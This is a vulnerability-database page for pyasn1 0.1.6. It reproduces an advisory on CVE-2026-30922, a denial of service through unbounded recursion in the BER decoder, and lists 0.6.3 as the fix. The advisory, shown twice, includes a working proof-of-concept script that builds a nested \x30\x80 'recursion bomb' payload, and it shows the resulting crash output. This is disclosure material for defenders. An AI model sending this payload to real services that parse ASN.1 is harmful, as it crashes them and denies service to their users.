VulnerableCode Package Details - pkg:pypi/pyasn1@0.1.6

Search for packages

Vulnerability	Summary	Fixed by
VCID-kth3-bvbt-gbgk Aliases: CVE-2026-30922 GHSA-jr27-m4p2-rc6r	Denial of Service in pyasn1 via Unbounded Recursion ### Summary The `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. ### Details The vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth. Vulnerable Code Locations: 1. `indefLenValueDecoder` (Line 998): ```for component in decodeFun(substrate, asn1Spec, allowEoo=True, options):``` This method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag. 2. `valueDecoder` (Lines 786 and 907): ```for component in decodeFun(substrate, componentType, options):``` This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types. 4. `_decodeComponentsSchemaless` (Line 661): ```for component in decodeFun(substrate, *options):``` This method handles decoding when no schema is provided. In all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit. ### PoC ``` import sys from pyasn1.codec.ber import decoder sys.setrecursionlimit(100000) print("[] Generating Recursion Bomb Payload...") depth = 50_000 chunk = b'\x30\x80' payload = chunk * depth print(f"[] Payload size: {len(payload) / 1024:.2f} KB") print("[] Triggering Decoder...") try: decoder.decode(payload) except RecursionError: print("[!] Crashed: Recursion Limit Hit") except MemoryError: print("[!] Crashed: Out of Memory") except Exception as e: print(f"[!] Crashed: {e}") ``` ``` [] Payload size: 9.77 KB [] Triggering Decoder... [!] Crashed: Recursion Limit Hit ``` ### Impact - This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion. - Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely. - Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack. ### Credits Vulnerability discovered by Kevin Tu of TMIR at ByteDance.	0.6.3 Affected by 0 other vulnerabilities.

Vulnerability

Summary

Fixed by

VCID-kth3-bvbt-gbgk
Aliases:
CVE-2026-30922
GHSA-jr27-m4p2-rc6r

Denial of Service in pyasn1 via Unbounded Recursion ### Summary The `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. ### Details The vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth. Vulnerable Code Locations: 1. `indefLenValueDecoder` (Line 998): ```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):``` This method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag. 2. `valueDecoder` (Lines 786 and 907): ```for component in decodeFun(substrate, componentType, **options):``` This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types. 4. `_decodeComponentsSchemaless` (Line 661): ```for component in decodeFun(substrate, **options):``` This method handles decoding when no schema is provided. In all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit. ### PoC ``` import sys from pyasn1.codec.ber import decoder sys.setrecursionlimit(100000) print("[*] Generating Recursion Bomb Payload...") depth = 50_000 chunk = b'\x30\x80' payload = chunk * depth print(f"[*] Payload size: {len(payload) / 1024:.2f} KB") print("[*] Triggering Decoder...") try: decoder.decode(payload) except RecursionError: print("[!] Crashed: Recursion Limit Hit") except MemoryError: print("[!] Crashed: Out of Memory") except Exception as e: print(f"[!] Crashed: {e}") ``` ``` [*] Payload size: 9.77 KB [*] Triggering Decoder... [!] Crashed: Recursion Limit Hit ``` ### Impact - This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion. - Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely. - Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack. ### Credits Vulnerability discovered by Kevin Tu of TMIR at ByteDance.

0.6.3
Affected by 0 other vulnerabilities.

Vulnerability	Summary	Aliases
This package is not known to fix vulnerabilities.

Vulnerability

Summary

Aliases

This package is not known to fix vulnerabilities.

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-04-29T23:26:52.684780+00:00	GitLab Importer	Affected by	VCID-kth3-bvbt-gbgk	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/pyasn1/CVE-2026-30922.yml	38.5.0
2026-04-19T18:06:33.436925+00:00	GitLab Importer	Affected by	VCID-kth3-bvbt-gbgk	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/pyasn1/CVE-2026-30922.yml	38.4.0

2026-04-29T23:26:52.684780+00:00

GitLab Importer

Affected by

VCID-kth3-bvbt-gbgk

https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/pyasn1/CVE-2026-30922.yml

38.5.0

2026-04-19T18:06:33.436925+00:00

GitLab Importer

Affected by

VCID-kth3-bvbt-gbgk

https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/pyasn1/CVE-2026-30922.yml

38.4.0

Next non-vulnerable version	0.6.3
Latest non-vulnerable version	0.6.3
Risk	4.0